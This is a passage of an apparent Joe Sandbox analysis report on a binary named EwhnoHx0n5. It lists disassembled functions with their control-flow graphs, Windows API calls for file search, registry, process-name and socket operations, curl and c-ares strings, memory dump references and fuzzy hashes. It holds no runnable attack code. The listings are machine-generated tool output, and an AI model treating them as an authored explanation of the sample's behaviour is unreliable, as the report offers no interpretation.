                                                        • API String ID: 3271271169-2507970851
                                                        • Opcode ID: 48e50ca9a661253d6958c34b688bd6dbdd0619d31737cf82a8253aaea3397d41
                                                        • Instruction ID: d7c96837059fee49195163c2488ef2a66e89ac3df4410707448dd08623124be6
                                                        • Opcode Fuzzy Hash: 48e50ca9a661253d6958c34b688bd6dbdd0619d31737cf82a8253aaea3397d41
                                                        • Instruction Fuzzy Hash: E9D193B49097199FCB10EF68C59569EBBF0FF48344F00896AE898D7311E7749A84CF92
                                                        Function 004529FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1301 4529ff-452a2f FindFirstFileA 1302 452a31-452a36 1301->1302 1303 452a38 1301->1303 1304 452a3d-452a91 call 8d9c50 call 8d9ce0 RegOpenKeyExA 1302->1304 1303->1304 1309 452a93-452a98 1304->1309 1310 452a9a 1304->1310 1311 452a9f-452b0c call 8d9c50 call 8d9ce0 CharUpperA call 7d8da0 1309->1311 1310->1311 1319 452b15 1311->1319 1320 452b0e-452b13 1311->1320 1321 452b1a-452b92 call 8d9c50 call 8d9ce0 call 7d8e80 call 7d8e70 1319->1321 1320->1321 1330 452b94-452ba3 1321->1330 1331 452bcc-452c66 QueryFullProcessImageNameA CloseHandle call 7d8da0 1321->1331 1334 452ba5-452bae 1330->1334 1335 452bb0-452bc0 call 7d8e68 1330->1335 1341 452c6f 1331->1341 1342 452c68-452c6d 1331->1342 1334->1331 1339 452bc5-452bca 1335->1339 1339->1330 1339->1331 1343 452c74-452ce9 call 8d9c50 call 8d9ce0 call 7d8e80 call 7d8e70 1341->1343 1342->1343 1352 452dcf-452e1c call 8d9c50 call 8d9ce0 CloseHandle 1343->1352 1353 452cef-452d49 call 7d8bb0 call 7d8da0 1343->1353 1363 452e23-452e2e 1352->1363 1364 452d99-452dad 1353->1364 1365 452d4b-452d63 call 7d8da0 1353->1365 1366 452e37 1363->1366 1367 452e30-452e35 1363->1367 1364->1352 1365->1364 1374 452d65-452d7d call 7d8da0 1365->1374 1369 452e3c-452ed6 call 8d9c50 call 8d9ce0 1366->1369 1367->1369 1382 452ed8-452ee1 1369->1382 1383 452eea 1369->1383 1374->1364 1379 452d7f-452d97 call 7d8da0 1374->1379 1379->1364 1385 452daf-452dc9 call 7d8e68 1379->1385 1382->1383 1386 452ee3-452ee8 1382->1386 1387 452eef-452f16 call 8d9c50 call 8d9ce0 1383->1387 1385->1352 1385->1353 1386->1387
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                        • String ID: 0
                                                        • API String ID: 2406880114-4108050209
                                                        • Opcode ID: 97f551e616e4072261a043b32f3913c398c0d9bd9eb90a10a6fdf427c3a522e6
                                                        • Instruction ID: 0253cf3ab2c0316cfcba953ddcd91938a51005e6d7065b572ba3cbfd49e37135
                                                        • Opcode Fuzzy Hash: 97f551e616e4072261a043b32f3913c398c0d9bd9eb90a10a6fdf427c3a522e6
                                                        • Instruction Fuzzy Hash: B5E1F9B49043059FCB50EF68D98569EBBF5EF48340F00886EE898D7351EB789949CF46
                                                        Function 004605B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1541 4605b0-4605b7 1542 4607ee 1541->1542 1543 4605bd-4605d4 1541->1543 1544 4607e7-4607ed 1543->1544 1545 4605da-4605e6 1543->1545 1544->1542 1545->1544 1546 4605ec-4605f0 1545->1546 1547 4605f6-460620 call 467350 call 4570b0 1546->1547 1548 4607c7-4607cc 1546->1548 1553 460622-460624 1547->1553 1554 46066a-46068c call 48dec0 1547->1554 1548->1544 1556 460630-460655 call 4570d0 call 4603c0 call 467450 1553->1556 1560 4607d6-4607e3 call 467380 1554->1560 1561 460692-4606a0 1554->1561 1581 4607ce 1556->1581 1582 46065b-460668 call 4570e0 1556->1582 1560->1544 1564 4606f4-4606f6 1561->1564 1565 4606a2-4606a4 1561->1565 1567 4607ef-46082b call 463000 1564->1567 1568 4606fc-4606fe 1564->1568 1570 4606b0-4606e4 call 4673b0 1565->1570 1585 460831-460837 1567->1585 1586 460a2f-460a35 1567->1586 1572 46072c-460754 1568->1572 1570->1560 1580 4606ea-4606ee 1570->1580 1577 460756-46075b 1572->1577 1578 46075f-46078b 1572->1578 1583 460707-460719 WSAEventSelect 1577->1583 1584 46075d 1577->1584 1598 460700-460703 1578->1598 1599 460791-460796 1578->1599 1580->1570 1587 4606f0 1580->1587 1581->1560 1582->1554 1582->1556 1583->1560 1591 46071f 1583->1591 1592 460723-460726 1584->1592 1594 460861-46087e 1585->1594 1595 460839-46084c call 466fa0 1585->1595 1588 460a37-460a3a 1586->1588 1589 460a3c-460a52 1586->1589 1587->1564 1588->1589 1589->1560 1596 460a58-460a81 call 462f10 1589->1596 1591->1592 1592->1567 1592->1572 1608 460882-46088d 1594->1608 1606 460852 1595->1606 1607 460a9c-460aa4 1595->1607 1596->1560 1614 460a87-460a97 call 466df0 1596->1614 1598->1583 1599->1598 1601 46079c-4607c2 call 4576a0 1599->1601 1601->1598 1606->1594 1611 460854-46085f 1606->1611 1607->1560 1612 460893-4608b1 1608->1612 1613 460970-460975 1608->1613 1611->1608 1617 4608c8-4608f7 1612->1617 1615 46097b-460989 call 4570b0 1613->1615 1616 460a19-460a2c 1613->1616 1614->1560 1615->1616 1624 46098f-46099e 1615->1624 1616->1586 1625 4608fd-460925 1617->1625 1626 4608f9-4608fb 1617->1626 1627 4609b0-4609c1 call 4570d0 1624->1627 1628 460928-46093f 1625->1628 1626->1628 1634 4609c3-4609c7 1627->1634 1635 4609a0-4609ae call 4570e0 1627->1635 1632 460945-46096b 1628->1632 1633 4608b3-4608c2 1628->1633 1632->1633 1633->1613 1633->1617 1637 4609e8-460a03 WSAEnumNetworkEvents 1634->1637 1635->1616 1635->1627 1638 460a05-460a17 1637->1638 1639 4609d0-4609e6 WSAEventSelect 1637->1639 1638->1639 1639->1635 1639->1637
                                                        APIs
                                                        • WSAEventSelect.WS2_32(?,?,?), ref: 00460711
                                                        • WSAEventSelect.WS2_32(?,?,00000000), ref: 004609DC
                                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004609FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: EventSelect$EnumEventsNetwork
                                                        • String ID: N=E$multi.c
                                                        • API String ID: 2170980988-170292696
                                                        • Opcode ID: 02dd7a3fdff9b9d760d30b6ebe39eb27e106d9cc6ff3f4828bd74b41283768e0
                                                        • Instruction ID: 46a2da0fd4f92bd6676781c5da003d0846e29c3c875a779eadebfa1684abc994
                                                        • Opcode Fuzzy Hash: 02dd7a3fdff9b9d760d30b6ebe39eb27e106d9cc6ff3f4828bd74b41283768e0
                                                        • Instruction Fuzzy Hash: 87D1ADB16083019FE710DF64C881B6BB7E9BF94349F04482EF88586282F778E959DB57
                                                        Function 0051B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 0051B2B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                                        • API String ID: 3358416759-2430778319
                                                        • Opcode ID: 8ad33cb1fa7416a2c9d60e1b3f3e9870f0fda74bb2431e8939daa0deabb840fa
                                                        • Instruction ID: 940cb7bf69bacf2293c9af06d45b6f89607ff888f3df7a9628ef45f2c16a0ec7
                                                        • Opcode Fuzzy Hash: 8ad33cb1fa7416a2c9d60e1b3f3e9870f0fda74bb2431e8939daa0deabb840fa
                                                        • Instruction Fuzzy Hash: D6C180756043059FF718DF24C884AAA7BE2FF88354F05896CE8598B3A1E735ED85CB81
                                                        Function 00466FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e26a153e81584ecf9fd5fe6cb5cab281f3d831e0f354741f09e4fefa567a67bd
                                                        • Instruction ID: fc98c1e228ae273f847155d4eca848b86e7961bbeef2078ab371c9685684d80c
                                                        • Opcode Fuzzy Hash: e26a153e81584ecf9fd5fe6cb5cab281f3d831e0f354741f09e4fefa567a67bd
                                                        • Instruction Fuzzy Hash: E891F43060C3094BD7358A2988947BB72D5EFC5368F148B2EE8A9433D4FB799C81D697
                                                        Function 0051A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0050712E,?,?,?,00001001,00000000), ref: 0051A90C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: recvfrom
                                                        • String ID:
                                                        • API String ID: 846543921-0
                                                        • Opcode ID: cea2f0178a491f0254c53f49facc1bff984835ca7636e56950662f395d0a6d88
                                                        • Instruction ID: f738946e989af142a7bc4871fb51cb76c6a3e320fed211b032ac0d03d7c0e540
                                                        • Opcode Fuzzy Hash: cea2f0178a491f0254c53f49facc1bff984835ca7636e56950662f395d0a6d88
                                                        • Instruction Fuzzy Hash: 34F01D75109348AFE2209E41DC44DABBBEDFFC9764F05496DF958232119271AE50CAB2
                                                        Function 0050A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0050AA19
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0050AA4C
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0050AA97
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0050AAE9
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0050AB30
                                                        • RegCloseKey.KERNELBASE(?), ref: 0050AB6A
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0050AB82
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0050AC46
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0050AD0A
                                                        • RegEnumKeyExA.KERNELBASE ref: 0050AD8D
                                                        • RegCloseKey.KERNELBASE(?), ref: 0050ADD9
                                                        • RegEnumKeyExA.KERNELBASE ref: 0050AE08
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0050AE2A
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0050AE54
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0050AF63
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0050AFB2
                                                        • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0050B072
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$Open$CloseEnum
                                                        • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                        • API String ID: 4217438148-1047472027
                                                        • Opcode ID: a1284b93ee716cfa52cd7d59ef0f29d600121735790511fb23da866d847846c3
                                                        • Instruction ID: 754e5634548068e7ea56561dd0006274ce8952e1255ff5271eb1e02c6884b2cc
                                                        • Opcode Fuzzy Hash: a1284b93ee716cfa52cd7d59ef0f29d600121735790511fb23da866d847846c3
                                                        • Instruction Fuzzy Hash: B0728EB1608301ABE720DB24CC85B6FBBE8BF85744F144828F9859B2E1E775E944CB53
                                                        Function 0048A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0048A832
                                                        Strings
                                                        • Bind to local port %d failed, trying next, xrefs: 0048AFE5
                                                        • cf_socket_open() -> %d, fd=%d, xrefs: 0048A796
                                                        • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0048AD0A
                                                        • bind failed with errno %d: %s, xrefs: 0048B080
                                                        • @, xrefs: 0048A8F4
                                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 0048ADAC
                                                        • Trying [%s]:%d..., xrefs: 0048A689
                                                        • Local port: %hu, xrefs: 0048AF28
                                                        • @, xrefs: 0048AC42
                                                        • cf-socket.c, xrefs: 0048A5CD, 0048A735
                                                        • Local Interface %s is ip %s using address family %i, xrefs: 0048AE60
                                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0048A6CE
                                                        • Couldn't bind to '%s' with errno %d: %s, xrefs: 0048AE1F
                                                        • Could not set TCP_NODELAY: %s, xrefs: 0048A871
                                                        • Trying %s:%d..., xrefs: 0048A7C2, 0048A7DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: setsockopt
                                                        • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3981526788-2373386790
                                                        • Opcode ID: a71eca29179885f9d235b7e87d98a906b97617112133165ebdc51a8c97307deb
                                                        • Instruction ID: 1facc89ce2f4f99a878eb19abcd5afee83062fc92213e82b65e8b853714833cd
                                                        • Opcode Fuzzy Hash: a71eca29179885f9d235b7e87d98a906b97617112133165ebdc51a8c97307deb
                                                        • Instruction Fuzzy Hash: DD620571508341ABE720AF14C846BAFB7E4AF81308F044D1FF98897252E7B9E855CB97
